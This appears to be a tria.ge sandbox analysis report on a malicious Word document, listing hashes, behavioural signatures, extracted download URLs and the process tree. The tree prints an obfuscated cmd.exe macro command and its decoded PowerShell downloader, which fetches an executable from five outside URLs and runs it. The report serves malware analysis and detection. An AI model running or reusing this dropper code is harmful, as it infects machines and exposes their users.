Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25/08/2024, 09:14
Behavioral task
behavioral1
Sample
c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc
-
Size
137KB
-
MD5
c06a2e5abd9ac5e50c7e1acc180fa4e2
-
SHA1
51bf7e1cac1e7f64289051b7a891804e1577ff51
-
SHA256
5f50deac85a3e3e51cb6c6d7f8fa81f1e426281225e8e685c90a32f23c8b15d8
-
SHA512
811ca504c7ae4b2b0dc20c374c467ba330a27805008b700022c22f43909406de463944d5d6c0ff09ac4985c50551d1d3c5aff157f603d85014f0fa89ab1d39ae
-
SSDEEP
1536:mFM5O81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9cX9jvVJZeI:G8GhDS0o9zTGOZD6EbzCdqX9DVuI
Malware Config
Extracted
http://www.exclusivetvlnet.com/eb1o4
http://rashmigupta.com/eU6
http://dellaconnor.com/6uHd8l
http://whitecertifiedangusbeef.com/eLUIv5P2
http://aidspolicyproject.org/u
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1980 2180 cmd.exe 28 -
pid Process 2616 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2180 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2616 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2180 WINWORD.EXE 2180 WINWORD.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2524 2180 WINWORD.EXE 29 PID 2180 wrote to memory of 2524 2180 WINWORD.EXE 29 PID 2180 wrote to memory of 2524 2180 WINWORD.EXE 29 PID 2180 wrote to memory of 2524 2180 WINWORD.EXE 29 PID 2180 wrote to memory of 1980 2180 WINWORD.EXE 30 PID 2180 wrote to memory of 1980 2180 WINWORD.EXE 30 PID 2180 wrote to memory of 1980 2180 WINWORD.EXE 30 PID 2180 wrote to memory of 1980 2180 WINWORD.EXE 30 PID 1980 wrote to memory of 2276 1980 cmd.exe 33 PID 1980 wrote to memory of 2276 1980 cmd.exe 33 PID 1980 wrote to memory of 2276 1980 cmd.exe 33 PID 1980 wrote to memory of 2276 1980 cmd.exe 33 PID 2276 wrote to memory of 2616 2276 cmd.exe 34 PID 2276 wrote to memory of 2616 2276 cmd.exe 34 PID 2276 wrote to memory of 2616 2276 cmd.exe 34 PID 2276 wrote to memory of 2616 2276 cmd.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2524
-
-
\??\c:\windows\SysWOW64\cmd.exec:\EDNsvwVDCMikH\SwsEwVtYlcJbX\VPzVzwLs\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cmd.exeCmD /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$JRj='sEE';$TwA=new-object Net.WebClient;$fFi='http://www.exclusivetvlnet.com/eb1o4@http://rashmigupta.com/eU6@http://dellaconnor.com/6uHd8l@http://whitecertifiedangusbeef.com/eLUIv5P2@http://aidspolicyproject.org/u'.Split('@');$Rkz='sUV';$Jsd = '197';$mAI='AUp';$OkZ=$env:temp+'\'+$Jsd+'.exe';foreach($WEJ in $fFi){try{$TwA.DownloadFile($WEJ, $OkZ);$Zzc='pho';If ((Get-Item $OkZ).length -ge 80000) {Invoke-Item $OkZ;$dJC='iwb';break;}}catch{}}$Yum='Oju';"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD515bceb3e4605f6768299b8294733c9fb
SHA1c7f7ab44bbb4b3c5ff2d9caca81956f47d7bcd49
SHA25649b1c9503cbc808b38ebd33f5e4d919375c05981239713b366e89158344d42b4
SHA512a73ef5f6742da7c8ee21dfd16971c553665dbdc0fc2d3097bf4634c151c8ff2c89688dadc0682f2167e4efd2eacff056c85322b1fe464b6baa9d80f272d7e8fd